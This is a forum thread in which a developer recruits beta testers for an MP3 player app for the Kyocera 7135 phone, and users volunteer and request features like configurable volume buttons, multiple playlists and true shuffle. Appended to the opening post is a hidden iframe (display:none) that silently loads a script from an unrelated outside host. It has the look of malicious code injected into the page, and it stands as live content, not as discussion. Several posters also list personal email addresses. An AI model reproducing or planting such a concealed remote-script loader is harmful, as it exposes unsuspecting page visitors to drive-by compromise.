+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

Looking for MP3 beta testers

The time has finally arrived to ask the community here if anyone is interested in giving an MP3 player specifically designed for the Kyocera 7135 a beta run. Several folks have expressed a desire for more features, so if you're one of them, read further.

I thought it important to start with what any MP3 player should offer, but not everything is completed. Need a sneak peek of features to see if it's worth your while? I've worked out the following features (among others) so far:

- Shuffle control (not just a simple random feature)
    - Pause play with the headet button
    - On-demand playlist generation
    - Next/previous track with the volume buttons

If you're still interested, you can respond here or PM me. Let me know why you want to beta test, and list any experience of yours that make you a good choice.

Thanks, folks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm in.... will give the rest of the info you asked for later, i just wanted to be the first to express intrest.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I would be more then happy to Beta for you. After 15 years in the computer industry, I have been a beta tester for many products. Glad to help out.

My real reason for responding...when you say "on demand playlist generation", will that include multiple playlist? I have a wide variety of musical tastes and would love to have multiple playlists.

Dave

Agree! This is one of the worst shortcomings of the provided player, IMHO. I've been through the renaming directories bit already and while it works, it's a pain.

It would be great if a player could support multiple directories, and playlists that could draw from any of the directories or easily get all files in a sigle directory!

Originally posted by dpointer 7
    I would be more then happy to Beta for you. After 15 years in the computer industry, I have been a beta tester for many products. Glad to help out.

My real reason for responding...when you say "on demand playlist generation", will that include multiple playlist? I have a wide variety of musical tastes and would love to have multiple playlists.

Dave

volume buttons

I would actually prefer to have the volume buttons actually control the volume instead of next/previous. Perhaps in some version you could make the button behavior be a user configurable option?

Alan

I'm in. I hate that thing. I'm very use to the Apple IPOD which pretty much perfect so my input is to make as many of their feature as possible.

One thing for sure is they (Kyo) seemed to put alot more time into how the player looked (graphic's and color- like that was important) in the MP3 design than functionality. I thought they teach form follows function in design school?

I agree with the suggestions here. I'd prefer the volume control buttons be configurable or mult-functional based on the duration of holding them.

Since I am an avid audiobook "reader", I am most interested in enabling playlist re-ordering and the ability to select multiple directories for playback. Note: I usually use a standard headset instead of the stereo headset.

I'll beta test! hdgelfuso@prodigy.net

Re: volume buttons

Originally posted by alanb
    I would actually prefer to have the volume buttons actually control the volume instead of next/previous. Perhaps in some version you could make the button behavior be a user configurable option?
    The hard-button control will be configurable. In fact it was originally intended to be volume-only, but other pieces of the puzzle weren't in place at the time to make it work. Now that I've completed that code, such functionality can be written.

Originally posted by dpointer
    Multiple playlists are planned for sure, dpointer. I've already worked on the design a little bit.

It all sounds really good PalmNut!
    Please visit my picture site: Robert-O-Rama :)

Great job PalmNut

Since we're brainstorming feature ideas, I'll throw one in as well:

Can we have it make a Playlist that would automatically populate with all the internal mp3 ringers, flips and such.. Something that would just look for file by creator "mp3p" and then have a column that would show the file type, like "flip,wild,ring,tone,syst or demo" That way we could play all the internal mp3 sounds from one spot instead of having to toggle through all the pref screens if we want to play them to show people.
    iPhone therefore iAm.

I would be surely interested. You can email me at sndtubes@vacuumtubes.com

thanks,
    Mike

MP3 beta

Hi I'd be interested, been using the phone now for ~ 5 weeks and have found multiple issues with the current factory version - which they admit are a problem - be really interested in your approach! post to: jsg2@hotmail.com

regards, runnur

Sounds great PalmNut. I was wondering if it would be possible to make the function of the volume buttons on the left side of the phone and the headset button to be user-settable? You could include a menu setting in your MP3 player to allow the user to pick from a list of potential functions for each of these volume buttons:
    -Next Track/Previous Track
    -Volume Up/Volume Down
    -Pause
    -Shuffle on/off
    -Repeat on/off
    -Balance left/right

(can't think of anymore but I'm sure there are others)

Thanks.

Andrew

I'm in... Jon.Taylor@jba.aero

Ditto on the Volume control, and is there a way to make it so that when you open the flip top, that it doesn't stop playing?

I'd be happy to test. I am an ipod owner as well.
    Thanks,
    Linda
    Linda

17" powerbook OSX

How about adding that you could hit and toggle "Pause" by pressing both external hardbuttons at the same time.

Also, is it possible to design it so that when you open the Mp3 player app, it doesn't need to rescan the SD card to know it's songs each friggin' time? It is so painful to go to the player and then have to wait until you can use, let alone see it.
    ~'kito
    pdaPhoneHome Moderator

Count me in as well. Having both a Clie and a Archos Jukebox, I'm willing to beta test this on my new bad boy!
    Derek

Sony Clie N710->Sony Clie NR70V->Treo 300->Kyocera 7135->Samsung SPH-i500->Treo 650 "ACE"

I'd also like to be a beta tester. I use the MP3 player a lot and the most annoying things for me are:

1) No external control with the phone closed other than placing or answering a call. Would prefer to use the external buttons for volume or next/prev (user configurable of course). Ideal for me would be quick press for next previous and press and hold for up and down volume. Maybe mute too.

2) Random being taken literally. Most CD players have either random or shuffle and usually work the same way, only playing each song once until all have played. I want true shuffle.

3) Multiple playlists would be nice.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.